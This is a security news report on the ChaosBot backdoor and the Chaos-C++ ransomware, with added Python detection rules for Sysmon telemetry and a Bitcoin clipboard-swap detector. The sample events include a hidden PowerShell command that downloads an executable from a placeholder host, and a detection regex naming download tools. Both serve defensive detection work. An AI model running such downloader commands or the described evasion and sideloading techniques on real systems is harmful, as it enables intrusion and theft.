
Cybersecurity researchers have uncovered a sophisticated new Rust-based backdoor named ChaosBot, capable of conducting reconnaissance and executing arbitrary commands on compromised systems. The malware was first detected in late September 2025 within a financial services environment, according to Canadian cybersecurity firm eSentire.
“Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, ‘serviceaccount,’” eSentire said in a technical report published last week. “Using the compromised account, they leveraged WMI to execute remote commands across systems in the network, facilitating the deployment and execution of ChaosBot.”
ChaosBot is notable for its use of Discord as a command-and-control (C2) channel. The malware receives instructions from a Discord profile maintained by the threat actor using the alias “chaos_00019,” with a second account, “lovebb0024,” also linked to operations. It can also spread through phishing messages containing a malicious Windows shortcut (LNK) file, which triggers a PowerShell command to download and execute ChaosBot while displaying a decoy PDF. Once deployed, it sideloads a malicious DLL, “msedge_elf.dll,” via Microsoft Edge’s “identity_helper.exe,” performs system reconnaissance, and downloads a fast reverse proxy to maintain persistent access.
“New variants of ChaosBot make use of evasion techniques to bypass ETW [Event Tracing for Windows] and virtual machines,” eSentire said. The malware patches instructions in ntdll!EtwEventWrite and checks MAC addresses against known VMware and VirtualBox prefixes to avoid detection. Supported commands include executing shell commands, capturing screenshots, and transferring files to and from Discord channels.
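The behaviours described above (WMI-driven remote command execution, the LNK-launched PowerShell downloader, the msedge_elf.dll sideload through identity_helper.exe, and the Discord C2 channel) each leave a distinct footprint in endpoint telemetry. The following is an added example, not eSentire's code and not taken from their report: a small set of Sysmon-style detection rules run over constructed sample events. The Microsoft Edge install roots, the process and domain lists used as matching criteria, and the sample events themselves are assumptions made for the example.

```python
"""Added example (not eSentire's code): Sysmon-style detection rules for the
ChaosBot tradecraft described in the article, run over constructed events.
Field names follow Sysmon event IDs 1 (process create), 3 (network connect)
and 7 (image load); the Edge install roots and sample data are assumptions."""
from __future__ import annotations

import ntpath
import re

# Assumed legitimate Edge install roots: identity_helper.exe and msedge_elf.dll
# normally live in a versioned subdirectory under one of these.
EDGE_ROOTS = (
    r"c:\program files\microsoft\edge\application",
    r"c:\program files (x86)\microsoft\edge\application",
)
DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")
# Processes for which Discord traffic is expected (assumed allow-list).
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe"}
# Interpreters/loaders that WmiPrvSE.exe should rarely spawn on a workstation.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell download primitives a LNK-launched stager typically relies on.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _under_edge_install(path: str) -> bool:
    return ntpath.dirname(path).lower().startswith(EDGE_ROOTS)


def _is_discord(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in DISCORD_DOMAINS)


def check_event(ev: dict) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: list[str] = []
    eid = ev.get("EventID")
    if eid == 7:  # image load: Edge helper pulling msedge_elf.dll from the wrong place
        if (_base(ev["Image"]) == "identity_helper.exe"
                and _base(ev["ImageLoaded"]) == "msedge_elf.dll"
                and (not _under_edge_install(ev["ImageLoaded"])
                     or ev.get("Signed", "false").lower() != "true")):
            hits.append("dll_sideload")
    elif eid == 1:  # process create
        parent, image = _base(ev["ParentImage"]), _base(ev["Image"])
        if parent == "wmiprvse.exe" and image in LOLBINS:
            hits.append("wmi_remote_exec")
        if (parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe"}
                and DOWNLOAD_RE.search(ev.get("CommandLine", ""))):
            hits.append("lnk_powershell_download")
    elif eid == 3:  # network connect: a non-browser process talking to Discord
        host = ev.get("DestinationHostname", "").lower()
        if _is_discord(host) and _base(ev["Image"]) not in BROWSERS:
            hits.append("discord_c2_candidate")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over a list of events; returns (event index, rule) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry: user name, paths, version directory and the
# download URL are made up for the example.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\identity_helper.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\msedge_elf.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\120.0.0.0\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\120.0.0.0\msedge_elf.dll",
     "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": r"CORP\serviceaccount",
     "CommandLine": r"cmd.exe /c C:\Windows\Temp\identity_helper.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/a -OutFile $env:TEMP\\a.exe"'},
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Temp\identity_helper.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\120.0.0.0\msedge.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The Discord rule is deliberately scoped to non-browser processes rather than to Discord traffic as such, because the domain is legitimate and widely used; the signal is which process is talking to it. Likewise the sideload rule fires on the load path and signature state, not on the DLL name alone, so a genuine Edge installation loading its own msedge_elf.dll stays quiet.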
In a related threat, Fortinet FortiGuard Labs detailed a new Chaos-C++ ransomware variant that introduces destructive file deletion and clipboard hijacking for cryptocurrency theft. “This dual strategy of destructive encryption and covert financial theft underscores Chaos’ transition into a more aggressive and multifaceted threat designed to maximize financial gain,” the company said. The ransomware, distributed under the guise of utilities like System Optimizer v2.1, targets files smaller than 50 MB for encryption, deletes files over 1.3 GB, and swaps Bitcoin addresses in clipboard content to redirect transactions.
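Clipboard hijacking of the kind Fortinet describes swaps one valid Bitcoin address for another, so checking that the clipboard holds a well-formed address proves nothing on its own; the usable signal is a valid address being replaced by a different valid address almost immediately, which no human copy-and-paste sequence normally produces. The following is an added example, not Fortinet's code: a detector run over constructed clipboard snapshots, with a Base58Check verifier for legacy addresses and a syntax-only check for bech32 ones. The two-second window, the sample timeline and the address formats covered are assumptions; the two addresses in the sample are public, well-known examples rather than anyone's wallet.

```python
"""Added example (not Fortinet's code): clipboard-swap detection for the
Bitcoin address hijacking described in the article, over constructed
clipboard snapshots.  The swap window and formats checked are assumptions."""
from __future__ import annotations

import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Syntax-only check for bech32 (bc1...) addresses; the checksum is not verified here.
BECH32_RE = re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$")


def base58check_ok(addr: str) -> bool:
    """Verify a legacy (1.../3...) address: Base58 alphabet, length, and the
    4-byte double-SHA256 checksum over the 21-byte version+hash160 payload."""
    if not (26 <= len(addr) <= 35) or addr[0] not in "13":
        return False
    if any(c not in B58 for c in addr):
        return False
    n = 0
    for c in addr:
        n = n * 58 + B58.index(c)
    try:
        raw = n.to_bytes(25, "big")  # leading '1's decode to leading zero bytes
    except OverflowError:
        return False
    digest = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()
    return digest[:4] == raw[21:]


def is_btc_address(text: str) -> bool:
    return base58check_ok(text) or bool(BECH32_RE.match(text))


def detect_swaps(snapshots, window_s: float = 2.0) -> list[dict]:
    """snapshots: iterable of (seconds, clipboard_text) in time order.
    Alert when one valid address is replaced by a *different* valid address
    within window_s seconds."""
    alerts: list[dict] = []
    prev_addr = prev_t = None
    for t, text in snapshots:
        text = text.strip()
        if not is_btc_address(text):
            prev_addr = None  # unrelated content breaks the chain
            continue
        if prev_addr is not None and text != prev_addr and t - prev_t <= window_s:
            alerts.append({"t": t, "original": prev_addr, "replaced_with": text})
        prev_addr, prev_t = text, t
    return alerts


# Constructed clipboard timeline.  The two addresses are public, well-known
# examples (the genesis-block address and the Bitcoin wiki's sample address).
SAMPLE_CLIPBOARD = [
    (0.0, "meeting moved to 10:30"),
    (5.0, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),   # user copies the payee address
    (5.3, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),   # replaced 300 ms later: hijack
    (40.0, "invoice 4471"),
    (60.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    (95.0, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),  # legitimate change 35 s later
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_CLIPBOARD):
        print(f"t={alert['t']}: {alert['original']} -> {alert['replaced_with']}")
```

On a real endpoint the snapshots would come from a clipboard listener; the detector itself only needs the ordered (time, text) pairs. Verifying the Base58Check checksum matters because it keeps ordinary text that merely looks address-like (a 30-character ticket ID, for instance) from starting or ending a chain and producing false alerts.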
“Rather than relying solely on full file encryption, Chaos-C++ employs a combination of methods, including symmetric or asymmetric encryption and a fallback XOR routine,” Fortinet said. The malware also ensures successful execution via a versatile downloader. Together, these traits make both ChaosBot and Chaos-C++ robust and difficult to disrupt, and they pose significant threats to enterprises worldwide.